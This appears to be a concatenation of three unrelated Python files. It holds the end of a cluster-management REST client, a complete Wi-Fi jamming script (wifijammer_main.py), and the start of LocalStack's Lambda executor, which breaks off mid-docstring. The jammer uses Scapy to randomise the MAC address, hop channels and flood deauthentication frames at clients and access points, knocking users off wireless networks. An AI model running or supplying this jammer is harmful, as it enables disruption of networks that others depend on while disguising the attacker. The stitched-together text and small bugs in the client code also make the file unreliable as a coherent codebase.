cpns.append(StackServiceComponent(service=self,name=cpn['StackServiceComponents']['component_name']))
return cpns
class StackServiceComponent(object):
def __init__(self,service,name):
self.service=service
self.name=name
self.url=self.service.url+'/components/'+self.name
@property
def info(self):
return self.service.stack.client.request(self.url)
class Cluster(object):
def __init__(self,client,stack,name):
self._info=None
self._hosts=None
self._services=None
self.client=client
self.stack=stack
self.name=name
self.url='/clusters/'+name
def create(self):
data = '{"Clusters":{"version":"'+self.stack.name+'-'+self.stack.version+'"}}'
return self.client.request(self.url,data=data,call_method=requests.post,wait=True)
@property
def info(self):
if not self._info:
self._info=self.client.request(self.url)
return self._info
@property
def services(self):
if self._services is None:
self._services=[]
for s in self.info['services']:
self._services.append(ClusterService(cluster=self,name=s['ServiceInfo']['service_name']))
return self._services
@property
def hosts(self):
if self._hosts is None:
self._hosts=[]
for h in self.info['hosts']:
self._hosts.append(Host(cluster=self,name=h['Hosts']['host_name']))
return self._hosts
def get_host(self,host_name):
for h in self.hosts:
if h.name==host_name:
return h
return None
def get_service(self,service_name):
for s in self.services:
if s.name==service_name:
return s
return None
def start(self):
data='{"RequestInfo":{"context":"_PARSE_.START.ALL_SERVICES","operation_level":{"level":"CLUSTER","cluster_name":"'+self.name+'"}},"Body":{"ServiceInfo":{"state":"STARTED"}}}'
return self.client.check(self.url+"/services",data,status_code=202,wait=True)
def stop(self):
data='{"RequestInfo":{"context":"_PARSE_.STOP.ALL_SERVICES","operation_level":{"level":"CLUSTER","cluster_name":"'+self.name+'"}},"Body":{"ServiceInfo":{"state":"INSTALLED"}}}'
return self.client.request(self.url+"/services",data,wait=True)
def register_host(self,host_name):
h=Host(cluster=self, name=host_name)
h.register()
return h
def clone_host(self,from_host_name,to_host_name):
h=Host(cluster=self, name=to_host_name)
h.clone(self.get_host(from_host_name))
return h
def remove_host(self,host_name):
self.get_host(host_name).remove()
class ClusterService(object):
def __init__(self,cluster,name):
self._info=None
self.cluster=cluster
self.name=name
self.url=self.cluster.url+"/services/"+self.name
@property
def info(self):
if not self._info:
self._info=self.cluster.client.request(self.url)
return self._info
@property
def components(self):
cs=[]
for c in self.info['components']:
cs.append(ClusterServiceComponent(service=self,name=c['ServiceComponentInfo']['component_name']))
return cs
@property
def status(self):
return self.cluster.client.request(self.url+'?fields=ServiceInfo/state')['ServiceInfo']['state']
def maintenance_on(self):
data='{"RequestInfo":{"context":"Turn on Maintenance for '+self.name+'"},"Body":{"ServiceInfo":{"maintenance_state":"ON"}}}'
return self.cluster.client.check(self.url,data,wait=True)
def maintenance_off(self):
data='{"RequestInfo":{"context":"Turn off Maintenance for '+self.name+'"},"Body":{"ServiceInfo":{"maintenance_state":"OFF"}}}'
return self.cluster.client.check(self.url,data,wait=True)
def start(self):
data='{"RequestInfo": {"context" :"Start service"}, "Body": {"ServiceInfo": {"state": "STARTED"}}}'
return self.cluster.client.check(self.url,data,status_code=202,wait=True)
def stop(self):
data='{"RequestInfo": {"context" :"Stop service"}, "Body": {"ServiceInfo": {"state": "INSTALLED"}}}'
return self.cluster.client.request(self.url,data,wait=True)
class ClusterServiceComponent(object):
def __init__(self,service,name):
self.service=service
self.name=name
self.url=self.service.url+'/components/'+self.name
@property
def info(self):
return self.service.cluster.client.request(self.url)
@property
def host_components(self):
hs=[]
for c in self.info['host_components']:
hs.append(HostComponent(name=c['HostRoles']['component_name'],host=self.service.cluster.get_host(c['HostRoles']['host_name'])))
return hs
class Host(object):
def __init__(self,cluster,name):
self._info=None
self.cluster=cluster
self.name=name
self.url=self.cluster.url+"/hosts/"+self.name
@property
def info(self):
if not self._info:
self._info=self.cluster.client.request(self.url)
return self._info
@property
def components(self):
if 'host_components' not in self.info: return ()
cmpns=[]
for c in self.info['host_components']:
cmpns.append(HostComponent(host=self,name=c['HostRoles']['component_name']))
return cmpns
def register(self):
self.cluster.client.check(self.url,call_method=requests.post,status_code=201,wait=True)
self.cluster._hosts.append(self)
def remove(self):
print('host_delete({})'.format(self.name))
for c in self.components(host):
c.stop()
if not c.delete():
return False
self.cluster.client.check(self.url,call_method=requests.delete,wait=True)
self.cluster.client.check(self.url,status_code=404)
self.cluster._hosts.remove(self)
def clone(self,from_host):
print('host_clone({},{})'.format(from_host.name,self.host.name))
self.register()
for c in from_host.components:
cpn=HostComponent(host=self, name=c.name)
Thread(target=cpn.install).start()
time.sleep(self.cluster.client.operation_interval)
class HostComponent(object):
def __init__(self,host,name):
self._info=None
self.host=host
self.name=name
self.url=self.host.url+'/host_components/'+self.name
@property
def info(self):
if not self._info:
self._info=self.host.cluster.client.check(self.url)
return self._info
@property
def service_name(self):
return self.info['HostRoles']['service_name']
@property
def install(self):
self.host.cluster.client.check(self.url,call_method=requests.post,status_code=201,wait=True)
data='{"RequestInfo":{"context":"Install '+self.name+'","operation_level":{"level":"HOST_COMPONENT","cluster_name":"'+self.host.cluster.name+'","host_name":"'+self.host.name+'","service_name":"'+self.service_name+'"}},"Body":{"HostRoles":{"state":"INSTALLED"}}}'
return self.host.cluster.client.check(self.url,data=data,status_code=202,wait=True)
def stop(self):
data='{"RequestInfo":{"context":"Stop Component"},"Body":{"HostRoles":{"state":"INSTALLED"}}}'
return self.host.cluster.client.check(self.url,data=data,status_code=200,wait=True)
def remove(self):
self.host.cluster.client.check(self.url,call_method=requests.delete)
return self.host.cluster.client.check(self.url,status_code=404,wait=True)
|
wifijammer_main.py
|
#!/usr/bin/env python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up Scapy
from scapy.all import *
conf.verb = 0 # Scapy I thought I told you to shut up
import os
import sys
import time
from threading import Thread, Lock
from subprocess import Popen, PIPE
from signal import SIGINT, signal
import argparse
import socket
import struct
import fcntl
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
def parse_args():
#Create the arguments
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--skip", help="Skip deauthing this MAC address. Example: -s 00:11:BB:33:44:AA")
parser.add_argument("-i", "--interface", help="Choose monitor mode interface. By default script will find the most powerful interface and starts monitor mode on it. Example: -i mon5")
parser.add_argument("-c", "--channel", help="Listen on and deauth only clients on the specified channel. Example: -c 6")
parser.add_argument("-m", "--maximum", help="Choose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5")
parser.add_argument("-n", "--noupdate", help="Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n", action='store_true')
parser.add_argument("-t", "--timeinterval", help="Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001")
parser.add_argument("-p", "--packets", help="Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2")
parser.add_argument("-d", "--directedonly", help="Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs", action='store_true')
parser.add_argument("-a", "--accesspoint", help="Enter the MAC address of a specific access point to target")
parser.add_argument("--world", help="N. American standard is 11 channels but the rest of the world it's 13 so this options enables the scanning of 13 channels", action="store_true")
return parser.parse_args()
########################################
# Begin interface info and manipulation
########################################
def get_mon_iface(args):
global monitor_on
monitors, interfaces = iwconfig()
if args.interface:
monitor_on = True
return args.interface
if len(monitors) > 0:
monitor_on = True
return monitors[0]
else:
# Start monitor mode on a wireless interface
print '['+G+'*'+W+'] Finding the most powerful interface...'
interface = get_iface(interfaces)
monmode = start_mon_mode(interface)
return monmode
def iwconfig():
monitors = []
interfaces = {}
try:
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
except OSError:
sys.exit('['+R+'-'+W+'] Could not execute "iwconfig"')
for line in proc.communicate()[0].split('\n'):
if len(line) == 0: continue # Isn't an empty string
if line[0] != ' ': # Doesn't start with space
wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
if not wired_search: # Isn't wired
iface = line[:line.find(' ')] # is the interface
if 'Mode:Monitor' in line:
monitors.append(iface)
elif 'IEEE 802.11' in line:
if "ESSID:\"" in line:
interfaces[iface] = 1
else:
interfaces[iface] = 0
return monitors, interfaces
def get_iface(interfaces):
scanned_aps = []
if len(interfaces) < 1:
sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again')
if len(interfaces) == 1:
for interface in interfaces:
return interface
# Find most powerful interface
for iface in interfaces:
count = 0
proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if ' - Address:' in line: # first line in iwlist scan for a new AP
count += 1
scanned_aps.append((count, iface))
print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W
try:
interface = max(scanned_aps)[1]
return interface
except Exception as e:
for iface in interfaces:
interface = iface
print '['+R+'-'+W+'] Minor error:',e
print ' Starting monitor mode on '+G+interface+W
return interface
def start_mon_mode(interface):
print '['+G+'+'+W+'] Starting monitor mode off '+G+interface+W
try:
os.system('ifconfig %s down' % interface)
os.system('macchanger -r {}'.format(interface))
os.system('iwconfig %s mode monitor' % interface)
os.system('ifconfig %s up' % interface)
return interface
except Exception:
sys.exit('['+R+'-'+W+'] Could not start monitor mode')
def remove_mon_iface(mon_iface):
os.system('ifconfig %s down' % mon_iface)
os.system('iwconfig %s mode managed' % mon_iface)
os.system('ifconfig %s up' % mon_iface)
def mon_mac(mon_iface):
'''
http://stackoverflow.com/questions/159137/getting-mac-address
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
return mac
########################################
# End of interface info and manipulation
########################################
def channel_hop(mon_iface, args):
'''
First time it runs through the channels it stays on each channel for 5 seconds
in order to populate the deauth list nicely. After that it goes as fast as it can
'''
global monchannel, first_pass
channelNum = 0
maxChan = 11 if not args.world else 13
err = None
while 1:
if args.channel:
with lock:
monchannel = args.channel
else:
channelNum +=1
if channelNum > maxChan:
channelNum = 1
with lock:
first_pass = 0
with lock:
monchannel = str(channelNum)
try:
proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
except OSError:
print '['+R+'-'+W+'] Could not execute "iw"'
os.kill(os.getpid(),SIGINT)
sys.exit(1)
for line in proc.communicate()[1].split('\n'):
if len(line) > 2: # iw dev shouldnt display output unless there's an error
err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W
output(err, monchannel)
if args.channel:
time.sleep(.05)
else:
# For the first channel hop thru, do not deauth
if first_pass == 1:
time.sleep(1)
continue
deauth(monchannel)
def deauth(monchannel):
'''
addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
multi-APs to one gateway. Constantly scans the clients_APs list and
starts a thread to deauth each instance
'''
pkts = []
if len(clients_APs) > 0:
with lock:
for x in clients_APs:
client = x[0]
ap = x[1]
ch = x[2]
# Can't add a RadioTap() layer as the first layer or it's a malformed
# Association request packet?
# Append the packets to a new list so we don't have to hog the lock
# type=0, subtype=12?
if ch == monchannel:
deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
pkts.append(deauth_pkt1)
pkts.append(deauth_pkt2)
if len(APs) > 0:
if not args.directedonly:
with lock:
for a in APs:
ap = a[0]
ch = a[1]
if ch == monchannel:
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
pkts.append(deauth_ap)
if len(pkts) > 0:
# prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
if not args.timeinterval:
args.timeinterval = 0
if not args.packets:
args.packets = 1
for p in pkts:
send(p, inter=float(args.timeinterval), count=int(args.packets))
def output(err, monchannel):
os.system('clear')
if err:
print err
else:
print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+monchannel+W+'\n'
if len(clients_APs) > 0:
print ' Deauthing ch ESSID'
# Print the deauth list
with lock:
for ca in clients_APs:
if len(ca) > 3:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
else:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2]
if len(APs) > 0:
print '\n Access Points ch ESSID'
with lock:
for ap in APs:
print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W
print ''
def noise_filter(skip, addr1, addr2):
# Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
if skip:
ignore.append(skip)
for i in ignore:
if i in addr1 or i in addr2:
return True
def cb(pkt):
'''
Look for dot11 packets that aren't to or from broadcast address,
are type 1 or 2 (control, data), and append the addr1 and addr2
to the list of deauth targets.
'''
global clients_APs, APs
# return these if's keeping clients_APs the same or just reset clients_APs?
# I like the idea of the tool repopulating the variable more
if args.maximum:
if args.noupdate:
if len(clients_APs) > int(args.maximum):
return
else:
if len(clients_APs) > int(args.maximum):
with lock:
clients_APs = []
APs = []
# We're adding the AP and channel to the deauth list at time of creation rather
# than updating on the fly in order to avoid costly for loops that require a lock
if pkt.haslayer(Dot11):
if pkt.addr1 and pkt.addr2:
pkt.addr1 = pkt.addr1.lower()
pkt.addr2 = pkt.addr2.lower()
# Filter out all other APs and clients if asked
if args.accesspoint:
if args.accesspoint not in [pkt.addr1, pkt.addr2]:
return
# Check if it's added to our AP list
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
APs_add(clients_APs, APs, pkt, args.channel, args.world)
# Ignore all the noisy packets like spanning tree
if noise_filter(args.skip, pkt.addr1, pkt.addr2):
return
# Management = 1, data = 2
if pkt.type in [1, 2]:
clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
def APs_add(clients_APs, APs, pkt, chan_arg, world_arg):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3.lower()
try:
# Thanks to airoscapy for below
ap_channel = str(ord(pkt[Dot11Elt:3].info))
if args.world == 'True':
chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']
else:
chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11']
if ap_channel not in chans:
return
if chan_arg:
if ap_channel != chan_arg:
return
except Exception as e:
return
if len(APs) == 0:
with lock:
return APs.append([bssid, ap_channel, ssid])
else:
for b in APs:
if bssid in b[0]:
return
with lock:
return APs.append([bssid, ap_channel, ssid])
def clients_APs_add(clients_APs, addr1, addr2):
if len(clients_APs) == 0:
if len(APs) == 0:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
else:
AP_check(addr1, addr2)
# Append new clients/APs if they're not in the list
else:
for ca in clients_APs:
if addr1 in ca and addr2 in ca:
return
if len(APs) > 0:
return AP_check(addr1, addr2)
else:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
def AP_check(addr1, addr2):
for ap in APs:
if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
with lock:
return clients_APs.append([addr1, addr2, ap[1], ap[2]])
def stop(signal, frame):
if monitor_on:
sys.exit('\n['+R+'!'+W+'] Closing')
else:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
sys.exit('\n['+R+'!'+W+'] Closing')
if __name__ == "__main__":
if os.geteuid():
sys.exit('['+R+'-'+W+'] Please run as root')
clients_APs = []
APs = []
DN = open(os.devnull, 'w')
lock = Lock()
args = parse_args()
monitor_on = None
mon_iface = get_mon_iface(args)
conf.iface = mon_iface
mon_MAC = mon_mac(mon_iface)
first_pass = 1
# Start channel hopping
hop = Thread(target=channel_hop, args=(mon_iface, args))
hop.daemon = True
hop.start()
signal(SIGINT, stop)
try:
sniff(iface=mon_iface, store=0, prn=cb)
except Exception as msg:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
print '\n['+R+'!'+W+'] Closing'
sys.exit(0)
|
lambda_executors.py
|
import os
import re
import sys
import glob
import json
import time
import logging
import threading
import traceback
import subprocess
import six
import base64
from multiprocessing import Process, Queue
try:
from shlex import quote as cmd_quote
except ImportError:
from pipes import quote as cmd_quote # for Python 2.7
from localstack import config
from localstack.utils import bootstrap
from localstack.utils.aws import aws_stack
from localstack.utils.common import (
CaptureOutput, FuncThread, TMP_FILES, short_uid, save_file, rm_rf, in_docker, long_uid,
now, to_str, to_bytes, run, cp_r, json_safe, get_free_tcp_port)
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils.aws.dead_letter_queue import lambda_error_to_dead_letter_queue
from localstack.utils.aws.dead_letter_queue import sqs_error_to_dead_letter_queue
from localstack.utils.aws.lambda_destinations import lambda_result_to_destination
from localstack.utils.cloudwatch.cloudwatch_util import store_cloudwatch_logs, cloudwatched
from localstack.services.awslambda.lambda_utils import (
LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11, LAMBDA_RUNTIME_PROVIDED)
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = 'cloud.localstack.LambdaExecutor'
EVENT_FILE_PATTERN = '%s/lambda.event.*.json' % config.TMP_FOLDER
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
# SQS event source name
EVENT_SOURCE_SQS = 'aws:sqs'
# IP address of main Docker container (lazily initialized)
DOCKER_MAIN_CONTAINER_IP = None
# maps lambda arns to concurrency locks
LAMBDA_CONCURRENCY_LOCK = {}
class InvocationException(Exception):
def __init__(self, message, log_output, result=None):
super(InvocationException, self).__init__(message)
self.log_output = log_output
self.result = result
def get_from_event(event, key):
try:
return event['Records'][0][key]
except KeyError:
return None
def is_java_lambda(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details)
return runtime in [LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11]
def is_nodejs_runtime(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details) or ''
return runtime.startswith('nodejs')
def _store_logs(func_details, log_output, invocation_time=None, container_id=None):
log_group_name = '/aws/lambda/%s' % func_details.name()
container_id = container_id or short_uid()
invocation_time = invocation_time or int(time.time() * 1000)
invocation_time_secs = int(invocation_time / 1000)
time_str = time.strftime('%Y/%m/%d', time.gmtime(invocation_time_secs))
log_stream_name = '%s/[LATEST]%s' % (time_str, container_id)
return store_cloudwatch_logs(log_group_name, log_stream_name, log_output, invocation_time)
def get_main_endpoint_from_container():
global DOCKER_MAIN_CONTAINER_IP
if DOCKER_MAIN_CONTAINER_IP is None:
DOCKER_MAIN_CONTAINER_IP = False
try:
if in_docker():
DOCKER_MAIN_CONTAINER_IP = bootstrap.get_main_container_ip()
LOG.info('Determined main container target IP: %s' % DOCKER_MAIN_CONTAINER_IP)
except Exception as e:
container_name = bootstrap.get_main_container_name()
LOG.info('Unable to get IP address of main Docker container "%s": %s' %
(container_name, e))
# return main container IP, or fall back to Docker host (bridge IP, or host DNS address)
return DOCKER_MAIN_CONTAINER_IP or config.DOCKER_HOST_FROM_CONTAINER
class InvocationResult(object):
def __init__(self, result, log_output=''):
if isinstance(result, InvocationResult):
raise Exception('Unexpected invocation result type: %s' % result)
self.result = result
self.log_output = log_output or ''
class LambdaExecutor(object):
""" Base class for Lambda executors. Subclasses must overwrite the _execute method """
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def _prepare_environment(self, func_details):
# setup environment pre-defined variables for docker environment
result = func_details.envvars.copy()
# injecting aws credentials into docker environment if not provided
aws_stack.inject_test_credentials_into_env(result)
# injecting the region into the docker environment
aws_stack.inject_region_into_env(result, func_details.region())
return result
def execute(self, func_arn, func_details, event, context=None, version=None,
asynchronous=False, callback=None):
def do_execute(*args):
@cloudwatched('lambda')
def _run(func_arn=None):
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
try:
result = self._execute(func_arn, func_details, event, context, version)
except Exception as e:
raised_error = e
if asynchronous:
if get_from_event(event, 'eventSource') == EVENT_SOURCE_SQS:
sqs_queue_arn = get_from_event(event, 'eventSourceARN')
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
dlq_sent = sqs_error_to_dead_letter_queue(sqs_queue_arn, event, e)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(func_details, event, e)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(result, func_arn, event, error=raised_error, dlq_sent=dlq_sent)
lambda_result_to_destination(func_details, event, result, asynchronous, raised_error)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug('Lambda executed in Event (asynchronous) mode, no response will be returned to caller')
FuncThread(do_execute).start()
return InvocationResult(None, log_output='Lambda executed asynchronously.')
return do_execute()
def _execute(self, func_arn, func_details, event, context=None, version=None):
""" This method must be overwritten by subclasses. """
raise Exception('Not implemented.')
def startup(self):
pass
def cleanup(self, arn=None):
pass
def run_lambda_executor(self, cmd, event=None, func_details=None, env_vars={}):
kwargs = {'stdin': True, 'inherit_env': True, 'asynchronous': True}
env_vars = env_vars or {}
runtime = func_details.runtime or ''
is_provided = runtime.startswith(LAMBDA_RUNTIME_PROVIDED)
if func_details and is_provided and env_vars.get('DOCKER_LAMBDA_USE_STDIN') == '1':
# Note: certain "provided" runtimes (e.g., Rust programs) can block when we pass in
# the event payload via stdin, hence we rewrite the command to "echo ... | ..." below
env_updates = {
'PATH': env_vars.get('PATH') or os.environ.get('PATH', ''),
'AWS_LAMBDA_EVENT_BODY': to_str(event),
'DOCKER_LAMBDA_USE_STDIN': '1'
}
env_vars.update(env_updates)
# Note: $AWS_LAMBDA_COGNITO_IDENTITY='{}' causes Rust Lambdas to hang
env_vars.pop('AWS_LAMBDA_COGNITO_IDENTITY', None)
event = None
cmd = re.sub(r'(.*)(%s\s+(run|start))' % self._docker_cmd(), r'\1echo $AWS_LAMBDA_EVENT_BODY | \2', cmd)
process = run(cmd, env_vars=env_vars, stderr=subprocess.PIPE, outfile=subprocess.PIPE, **kwargs)
result, log_output = process.communicate(input=event)
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, six.string_types) and '\n' in result:
additional_logs, _, result = result.rpartition('\n')
log_output += '\n%s' % additional_logs
log_formatted = log_output.strip().replace('\n', '\n> ')
func_arn = func_details and func_details.arn()
LOG.debug('Lambda %s result / log output:\n%s\n> %s' % (func_arn, result.strip(), log_formatted))
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if return_code != 0:
raise InvocationException('Lambda process returned error status code: %s. Result: %s. Output:\n%s' %
(return_code, result, log_output), log_output, result)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
class ContainerInfo:
""" Contains basic information about a docker container. """
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
""" Abstract executor class for executing Lambda functions in Docker containers """
def prepare_execution(self, func_details, env_vars, command):
raise Exception('Not implemented')
def _docker_cmd(self):
""" Return the string to be used for running Docker commands. """
return config.DOCKER_CMD
def prepare_event(self, environment, event_body):
""" Return the event as a stdin string. """
# amend the environment variables for execution
environment['AWS_LAMBDA_EVENT_BODY'] = event_body
return None
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
environment = self._prepare_environment(func_details)
# configure USE_SSL in environment
if config.USE_SSL:
environment['USE_SSL'] = '1'
# prepare event body
if not event:
LOG.warning('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(json_safe(event))
stdin = self.prepare_event(environment, event_body)
main_endpoint = get_main_endpoint_from_container()
environment['LOCALSTACK_HOSTNAME'] = main_endpoint
environment['EDGE_PORT'] = str(config.EDGE_PORT)
environment['_HANDLER'] = handler
if os.environ.get('HTTP_PROXY'):
environment['HTTP_PROXY'] = os.environ['HTTP_PROXY']
if func_details.timeout:
environment['AWS_LAMBDA_FUNCTION_TIMEOUT'] = str(func_details.timeout)
if context:
environment['AWS_LAMBDA_FUNCTION_NAME'] = context.function_name
environment['AWS_LAMBDA_FUNCTION_VERSION'] = context.function_version
environment['AWS_LAMBDA_FUNCTION_INVOKED_ARN'] = context.invoked_function_arn
environment['AWS_LAMBDA_COGNITO_IDENTITY'] = json.dumps(context.cognito_identity or {})
if context.client_context is not None:
environment['AWS_LAMBDA_CLIENT_CONTEXT'] = json.dumps(to_str(
base64.b64decode(to_bytes(context.client_context))))
#if os.environ.get('AWS_ACCESS_KEY_ID'):
# LOG.info("using access key")
environment['AWS_ACCESS_KEY_ID'] = 'test'
# if os.environ.get('AWS_SECRET_ACCESS_KEY'):
# LOG.info("using secret access")
environment['AWS_SECRET_ACCESS_KEY'] = 'test'
# custom command to execute in the container
command = ''
events_file = ''
if config.LAMBDA_JAVA_OPTS and is_java_lambda(runtime):
# if running a Java Lambda with our custom executor, set up classpath arguments
java_opts = Util.get_java_opts()
stdin = None
# copy executor jar into temp directory
target_file = os.path.join(lambda_cwd, os.path.basename(LAMBDA_EXECUTOR_JAR))
if not os.path.exists(target_file):
cp_r(LAMBDA_EXECUTOR_JAR, target_file)
# TODO cleanup once we have custom Java Docker image
taskdir = '/var/task'
events_file = '_lambda.events.%s.json' % short_uid()
save_file(os.path.join(lambda_cwd, events_file), event_body)
classpath = Util.get_java_classpath(target_file)
command = ("bash -c 'cd %s; java %s -cp \"%s\" \"%s\" \"%s\" \"%s\"'" %
(taskdir, java_opts, classpath, LAMBDA_EXECUTOR_CLASS, handler, events_file))
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment['NODE_TLS_REJECT_UNAUTHORIZED'] = '0'
# determine the command to be executed (implemented by subclasses)
cmd = self.prepare_execution(func_details, environment, command)
# run Lambda executor and fetch invocation result
LOG.info('Running lambda cmd: %s' % cmd)
result = self.run_lambda_executor(cmd, stdin, env_vars=environment, func_details=func_details)
# clean up events file
events_file and os.path.exists(events_file) and rm_rf(events_file)
return result
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
""" Executor class for executing Lambda functions in re-usable Docker containers """
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def prepare_execution(self, func_details, env_vars, command):
func_arn = func_details.arn()
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars['_LAMBDA_SERVER_PORT'] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug('Priming docker container with runtime "%s" and arn "%s".', runtime, func_arn)
container_info = self.prime_docker_container(func_details, env_vars.items(), lambda_cwd)
# Note: currently "docker exec" does not support --env-file, i.e., environment variables can only be
# passed directly on the command line, using "-e" below. TODO: Update this code once --env-file is
# available for docker exec, to better support very large Lambda events (very long environment values)
exec_env_vars = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
if not command:
command = '%s %s' % (container_info.entry_point, handler)
# determine files to be copied into the container
copy_command = ''
docker_cmd = self._docker_cmd()
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
copy_command = '%s cp "%s/." "%s:/var/task";' % (docker_cmd, lambda_cwd, container_info.name)
cmd = (
'%s'
' %s exec'
' %s' # env variables
' %s' # container name
' %s' # run cmd
) % (copy_command, docker_cmd, exec_env_vars, container_info.name, command)
LOG.debug('Command for docker-reuse Lambda executor: %s' % cmd)
return cmd
def _execute(self, func_arn, *args, **kwargs):
if not LAMBDA_CONCURRENCY_LOCK.get(func_arn):
concurrency_lock = threading.RLock()
LAMBDA_CONCURRENCY_LOCK[func_arn] = concurrency_lock
with LAMBDA_CONCURRENCY_LOCK[func_arn]:
return super(LambdaExecutorReuseContainers, self)._execute(func_arn, *args, **kwargs)
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(self, func_details, env_vars, lambda_cwd):
"""
